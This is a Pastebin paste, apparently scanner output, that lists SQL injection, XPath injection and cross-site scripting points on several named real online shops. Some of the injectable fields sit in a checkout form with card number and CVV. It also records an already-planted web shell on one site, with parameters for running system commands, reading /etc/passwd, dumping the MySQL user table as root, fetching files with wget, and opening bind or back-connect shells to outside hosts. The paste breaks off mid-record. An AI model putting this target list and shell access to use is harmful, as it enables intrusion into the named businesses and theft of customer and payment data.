Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SQLi Sites & Vulnerabilities 6 [Tales from CyberSpace] Set Tripping Pack
- -------------------------------------------------------------------------
- - <ROOT>
- - <SiteVulList>
- - <VulRow>
- <ReferURL>http://www.4mua.com/shop/checkout_shipping.php</ReferURL>
- <Parameter>stastus_search</Parameter>
- <Type>POST</Type>
- <KWordActionURL>https://www.4mua.com/shop/privacy.php?action=search^stastus_search=WCRTESTINPUT000000<>%3c%3e%253c%253e</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.4mua.com/content/../shop</ReferURL>
- <Parameter>stastus_search</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.4mua.com/shop/privacy.php?action=search^stastus_search=WCRTESTINPUT000000<>%3c%3e%253c%253e</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.4mua.com/shop/index.php?cPath=1343&p_sort=1</ReferURL>
- <Parameter>p_sort=1</Parameter>
- <Type>String</Type>
- <KWordActionURL>Gifts</KWordActionURL>
- <Vulnerability>URL SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.4mua.com/shop/shopping_cart.php^action=update_product</ReferURL>
- <Parameter>action=update_product</Parameter>
- <Type>String</Type>
- <KWordActionURL>Thuong</KWordActionURL>
- <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.4mua.com/shop/advanced_search_result.php?pto=WCRTESTINPUT000002&dfrom=mm/dd/yyyy&dto=mm/dd/yyyy&categories_id=3&manufacturers_id=4&keywords=WCRTESTINPUT000000&pfrom=WCRTESTINPUT000001</ReferURL>
- <Parameter>pfrom=!S!WCRTESTINPUT000001!E!</Parameter>
- <Type>String</Type>
- <KWordActionURL>Warning</KWordActionURL>
- <Vulnerability>URL SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/products.php?id=22</ReferURL>
- <Parameter>id=22</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Fujitsu</KWordActionURL>
- <Vulnerability>URL SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/products.php?id=99999999</ReferURL>
- <Parameter>id=99999999</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Fujitsu</KWordActionURL>
- <Vulnerability>URL SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/products.php</ReferURL>
- <Parameter>min_price=99999999</Parameter>
- <Type>String</Type>
- <KWordActionURL>http://www.splits4you.com/products.php?max_price=WCRTESTINPUT000001&cooling_capacity=WCRTESTINPUT000002&heating_capacity=WCRTESTINPUT000003&submit=Filter&manufacturer=all&unit_type=all&cooling_star_rating=any&heating_star_rating=any&min_price=99999999</KWordActionURL>
- <Vulnerability>XPath INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/products.php</ReferURL>
- <Parameter>cooling_capacity=99999999</Parameter>
- <Type>String</Type>
- <KWordActionURL>http://www.splits4you.com/products.php?heating_capacity=WCRTESTINPUT000003&submit=Filter&manufacturer=all&unit_type=all&cooling_star_rating=any&heating_star_rating=any&min_price=WCRTESTINPUT000000&max_price=WCRTESTINPUT000001&cooling_capacity=99999999</KWordActionURL>
- <Vulnerability>XPath INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/products.php?manufacturer=1</ReferURL>
- <Parameter>heating_capacity=99999999</Parameter>
- <Type>String</Type>
- <KWordActionURL>http://www.splits4you.com/products.php?submit=Filter&manufacturer=all&unit_type=all&cooling_star_rating=any&heating_star_rating=any&min_price=WCRTESTINPUT000000&max_price=WCRTESTINPUT000001&cooling_capacity=WCRTESTINPUT000002&heating_capacity=99999999</KWordActionURL>
- <Vulnerability>XPath INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/contact.php</ReferURL>
- <Parameter>name</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/contact.php^name=WCRTESTINPUT000000<>%3c%3e%253c%253e&email=WCRTESTINPUT000001&address=WCRTESTINPUT000002&postcode=WCRTESTINPUT000003&phone=WCRTESTINPUT000004&message=WCRTESTTEXTAREA000005</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/contact.php</ReferURL>
- <Parameter>email</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/contact.php^name=WCRTESTINPUT000000&email=WCRTESTINPUT000001<>%3c%3e%253c%253e&address=WCRTESTINPUT000002&postcode=WCRTESTINPUT000003&phone=WCRTESTINPUT000004&message=WCRTESTTEXTAREA000005</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/contact.php</ReferURL>
- <Parameter>address</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/contact.php^name=WCRTESTINPUT000000&email=WCRTESTINPUT000001&address=WCRTESTINPUT000002<>%3c%3e%253c%253e&postcode=WCRTESTINPUT000003&phone=WCRTESTINPUT000004&message=WCRTESTTEXTAREA000005</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/contact.php</ReferURL>
- <Parameter>postcode</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/contact.php^name=WCRTESTINPUT000000&email=WCRTESTINPUT000001&address=WCRTESTINPUT000002&postcode=WCRTESTINPUT000003<>%3c%3e%253c%253e&phone=WCRTESTINPUT000004&message=WCRTESTTEXTAREA000005</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/contact.php</ReferURL>
- <Parameter>phone</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/contact.php^name=WCRTESTINPUT000000&email=WCRTESTINPUT000001&address=WCRTESTINPUT000002&postcode=WCRTESTINPUT000003&phone=WCRTESTINPUT000004<>%3c%3e%253c%253e&message=WCRTESTTEXTAREA000005</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/contact.php</ReferURL>
- <Parameter>message</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/contact.php^name=WCRTESTINPUT000000&email=WCRTESTINPUT000001&address=WCRTESTINPUT000002&postcode=WCRTESTINPUT000003&phone=WCRTESTINPUT000004&message=WCRTESTINPUT000005<>%3c%3e%253c%253e</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php?sqlman</ReferURL>
- <Parameter>host</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php?sqlman^host=WCRTESTINPUT000000<>%3c%3e%253c%253e&userid=WCRTESTINPUT000000&pword1=WCRTESTINPUT000001&login=login</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php?sqlman</ReferURL>
- <Parameter>userid</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php?sqlman^host=localhost&userid=WCRTESTINPUT000001<>%3c%3e%253c%253e&pword1=WCRTESTINPUT000001&login=login</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php?</ReferURL>
- <Parameter>command</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php?^dir=/home/timweb40/splits4you.com/images/products&command=WCRTESTINPUT000001<>%3c%3e%253c%253e&cmd=command&submit=Execute&method=system</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php?</ReferURL>
- <Parameter>log</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php?^log=WCRTESTINPUT000000<>%3c%3e%253c%253e&dir=/home/timweb40/splits4you.com/images/products&cmd=Crippling been planted and you can use filename.php?ss=http://shell.txt?&submit=Create</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php?</ReferURL>
- <Parameter>glob</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php?^glob=WCRTESTINPUT000000<>%3c%3e%253c%253e&cmd=glob&dir=/home/timweb40/splits4you.com/images/products&submit=Show</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php?^dir=/home/timweb40/splits4you.com/images/products&cmd=zend&submit=Test&zend=/etc/passwd</ReferURL>
- <Parameter>zend=/etc/passwd</Parameter>
- <Type>String</Type>
- <KWordActionURL>zMTkBaNrQAAL</KWordActionURL>
- <Vulnerability>POST SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php?</ReferURL>
- <Parameter>zend</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php?^zend=WCRTESTINPUT000000<>%3c%3e%253c%253e&dir=/home/timweb40/splits4you.com/images/products&cmd=zend&submit=Test</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php?</ReferURL>
- <Parameter>loc_file</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php?^dir=/home/timweb40/splits4you.com/images/products&rem_file=http://&loc_file=WCRTESTINPUT000002<>%3c%3e%253c%253e&submit=Upload&with=wget</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php?</ReferURL>
- <Parameter>mysql_l</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php?^db_server=localhost&db_port=3306&mysql_l=WCRTESTINPUT000002<>%3c%3e%253c%253e&mysql_p=password&mysql_db=mysql&mysql_tbl=user&dir=/home/timweb40/splits4you.com/images/products&cmd=mysql_dump&dif_name=dump.sql&submit=Dump</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php?</ReferURL>
- <Parameter>db_query</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php?^db_server=localhost&db_port=3306&mysql_l=root&mysql_p=password&mysql_db=mysql&dir=/home/timweb40/splits4you.com/images/products&cmd=db_query&submit=Execute&db_query=WCRTESTINPUT000008<>%3c%3e%253c%253e</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php?^dir=/home/timweb40/splits4you.com/images/products&submit=Run&use=Perl&local_port=80&remote_host=irc.dalnet.ru&remote_port=6667</ReferURL>
- <Parameter>remote_port=6667</Parameter>
- <Type>String</Type>
- <KWordActionURL>dalnet</KWordActionURL>
- <Vulnerability>POST SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php?</ReferURL>
- <Parameter>ips</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php?^ips=WCRTESTINPUT000000<>%3c%3e%253c%253e&ports=80&dir=/home/timweb40/splits4you.com/images/products&submit=Connect&use=Perl</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php?tmp</ReferURL>
- <Parameter>cmd</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php?tmp^cmd=WCRTESTINPUT000000<>%3c%3e%253c%253e&dir=/home/timweb40/splits4you.com/images/products&submit=Execute</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php?tmp</ReferURL>
- <Parameter>ftp_file</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php?tmp^ftp_server_port=127.0.0.1:21&ftp_login=anonymous&[email protected]&ftp_file=WCRTESTINPUT000003<>%3c%3e%253c%253e&cmd=ftp_file_down&loc_file=/home/timweb40/splits4you.com/images/products&dir=/home/timweb40/splits4you.com/images/products&submit=Download</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php?tmp</ReferURL>
- <Parameter>subj</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php?tmp^[email protected]&cmd=mail&dir=/home/timweb40/splits4you.com/images/products&[email protected]&subj=WCRTESTINPUT000004<>%3c%3e%253c%253e&submit=Send&text=WCRTESTTEXTAREA000000</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php?tmp</ReferURL>
- <Parameter>mysql_db</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php?tmp^db_server=localhost&db_port=3306&mysql_l=root&mysql_p=password&mysql_db=WCRTESTINPUT000004<>%3c%3e%253c%253e&mysql_tbl=user&dir=/home/timweb40/splits4you.com/images/products&cmd=mysql_dump&dif_name=dump.sql&submit=Dump</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php?tmp</ReferURL>
- <Parameter>port</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php?tmp^port=WCRTESTINPUT000000<>%3c%3e%253c%253e&bind_pass=SnIpEr&dir=/home/timweb40/splits4you.com/images/products&submit=Bind&use=Perl</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php?tmp</ReferURL>
- <Parameter>ports</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php?tmp^ips=109.169.70.134&ports=WCRTESTINPUT000001<>%3c%3e%253c%253e&dir=/home/timweb40/splits4you.com/images/products&submit=Connect&use=Perl</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
- <Parameter>e_name</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php^e_name=WCRTESTINPUT000000<>%3c%3e%253c%253e&cmd=edit_file&dir=/home/timweb40/splits4you.com/images/products&submit=Edit file</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
- <Parameter>test3_md</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php^test3_md=WCRTESTINPUT000000<>%3c%3e%253c%253e&test3_ml=root&test3_mp=password&test3_file=/etc/passwd&dir=/home/timweb40/splits4you.com/images/products&cmd=mysqlb&submit=Test</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
- <Parameter>rem_file</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php^dir=/home/timweb40/splits4you.com/images/products&rem_file=WCRTESTINPUT000001<>%3c%3e%253c%253e&loc_file=/home/timweb40/splits4you.com/images/products&submit=Upload&with=wget</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
- <Parameter>ftp_login</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php^ftp_server_port=127.0.0.1:21&ftp_login=WCRTESTINPUT000001<>%3c%3e%253c%253e&[email protected]&ftp_file=/ftp-dir/file&cmd=ftp_file_down&loc_file=/home/timweb40/splits4you.com/images/products&dir=/home/timweb40/splits4you.com/images/products&submit=Download</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
- <Parameter>from</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php^[email protected]&cmd=mail&dir=/home/timweb40/splits4you.com/images/products&from=WCRTESTINPUT000003<>%3c%3e%253c%253e&subj=hello billy&submit=Send&text=WCRTESTTEXTAREA000000</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
- <Parameter>text</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php^[email protected]&cmd=mail&dir=/home/timweb40/splits4you.com/images/products&[email protected]&subj=hello billy&submit=Send&text=WCRTESTINPUT000006<>%3c%3e%253c%253e</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
- <Parameter>db_server</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php^db_server=WCRTESTINPUT000000<>%3c%3e%253c%253e&db_port=3306&mysql_l=root&mysql_p=password&mysql_db=mysql&mysql_tbl=user&dir=/home/timweb40/splits4you.com/images/products&cmd=mysql_dump&dif_name=dump.sql&submit=Dump</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
- <Parameter>db_port</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php^db_server=localhost&db_port=WCRTESTINPUT000001<>%3c%3e%253c%253e&mysql_l=root&mysql_p=password&mysql_db=mysql&mysql_tbl=user&dir=/home/timweb40/splits4you.com/images/products&cmd=mysql_dump&dif_name=dump.sql&submit=Dump</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
- <Parameter>mysql_p</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php^db_server=localhost&db_port=3306&mysql_l=root&mysql_p=WCRTESTINPUT000003<>%3c%3e%253c%253e&mysql_db=mysql&mysql_tbl=user&dir=/home/timweb40/splits4you.com/images/products&cmd=mysql_dump&dif_name=dump.sql&submit=Dump</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
- <Parameter>mysql_tbl</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php^db_server=localhost&db_port=3306&mysql_l=root&mysql_p=password&mysql_db=mysql&mysql_tbl=WCRTESTINPUT000005<>%3c%3e%253c%253e&dir=/home/timweb40/splits4you.com/images/products&cmd=mysql_dump&dif_name=dump.sql&submit=Dump</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
- <Parameter>dif_name</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php^db_server=localhost&db_port=3306&mysql_l=root&mysql_p=password&mysql_db=mysql&mysql_tbl=user&dir=/home/timweb40/splits4you.com/images/products&cmd=mysql_dump&dif_name=WCRTESTINPUT000008<>%3c%3e%253c%253e&submit=Dump</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://www.splits4you.com/images/products/revision.php</ReferURL>
- <Parameter>ip</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://www.splits4you.com/images/products/revision.php^ip=WCRTESTINPUT000000<>%3c%3e%253c%253e&port=80&dir=/home/timweb40/splits4you.com/images/products&submit=Connect&use=Perl</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=223&name=Aquafinesse</ReferURL>
- <Parameter>name=Aquafinesse</Parameter>
- <Type>String</Type>
- <KWordActionURL>Hydraulic</KWordActionURL>
- <Vulnerability>URL SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=223^name=Aquafinesse</ReferURL>
- <Parameter>name=Aquafinesse</Parameter>
- <Type>String</Type>
- <KWordActionURL>CoverMate</KWordActionURL>
- <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=35</ReferURL>
- <Parameter>id=35</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Replacement</KWordActionURL>
- <Vulnerability>URL SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=273&name=Replacement%20Hot%20Tub%20Cover^TradeShop_1_ID_Add=273&TradeShop_1_Quantity_Add=1</ReferURL>
- <Parameter>TradeShop_1_Quantity_Add=1</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Super</KWordActionURL>
- <Vulnerability>POST SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=6&name=Swirl%20Away^TradeShop_1_Quantity_Add=1&TradeShop_1_ID_Add=6</ReferURL>
- <Parameter>TradeShop_1_ID_Add=6</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Antifoam</KWordActionURL>
- <Vulnerability>POST SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=223&name=Aquafinesse^Submit=Go!&q=WCRTESTINPUT000000</ReferURL>
- <Parameter>q=!S!WCRTESTINPUT000000!E!</Parameter>
- <Type>String</Type>
- <KWordActionURL>Pleatco</KWordActionURL>
- <Vulnerability>POST SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=223&name=Aquafinesse^Submit=Go!&q=1</ReferURL>
- <Parameter>q=1</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Above</KWordActionURL>
- <Vulnerability>POST SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=223&name=Aquafinesse</ReferURL>
- <Parameter>q=99999999</Parameter>
- <Type>String</Type>
- <KWordActionURL>http://uktubstore.co.uk/shop/product_detail.php?id=223&name=Aquafinesse^Submit=Go!&q=99999999</KWordActionURL>
- <Vulnerability>XPath INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/filter_finder.php</ReferURL>
- <Parameter>len=99999999</Parameter>
- <Type>String</Type>
- <KWordActionURL>http://uktubstore.co.uk/shop/filter_finder_results2.php?button2=Search&len=99999999</KWordActionURL>
- <Vulnerability>XPath INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/filter_finder.php</ReferURL>
- <Parameter>len</Parameter>
- <Type>GET</Type>
- <KWordActionURL>http://uktubstore.co.uk/shop/filter_finder_results2.php?len=WCRTESTINPUT000000<>%3c%3e%253c%253e&button2=Search</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=273&OPT_ID=0</ReferURL>
- <Parameter>OPT_ID=0</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Multipack</KWordActionURL>
- <Vulnerability>URL SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/product_detail.php?id=273^OPT_ID=0</ReferURL>
- <Parameter>OPT_ID=0</Parameter>
- <Type>Integer</Type>
- <KWordActionURL>Sundance</KWordActionURL>
- <Vulnerability>COOKIE SQL INJECTION</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
- <Parameter>cc_number</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000<>%3c%3e%253c%253e&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
- <Parameter>cvv</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001<>%3c%3e%253c%253e&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
- <Parameter>firstname</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002<>%3c%3e%253c%253e&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
- <Parameter>lastname</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003<>%3c%3e%253c%253e&email=WCRTESTINPUT000004&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
- <Parameter>email</Parameter>
- <Type>POST</Type>
- <KWordActionURL>http://uktubstore.co.uk/shop/confirm2.php^cc_number=WCRTESTINPUT000000&cvv=WCRTESTINPUT000001&firstname=WCRTESTINPUT000002&lastname=WCRTESTINPUT000003&email=WCRTESTINPUT000004<>%3c%3e%253c%253e&phone=WCRTESTINPUT000005&street1=WCRTESTINPUT000006&street2=WCRTESTINPUT000007&city=WCRTESTINPUT000008&county=WCRTESTINPUT000009&postcode=WCRTESTINPUT000010&cc_type=Visa&start_month=01&start_year=01&exp_month=01&exp_year=08&card_issue=01</KWordActionURL>
- <Vulnerability>Cross Site Scripting(Form)</Vulnerability>
- </VulRow>
- - <VulRow>
- <ReferURL>http://uktubstore.co.uk/shop/checkout.php</ReferURL>
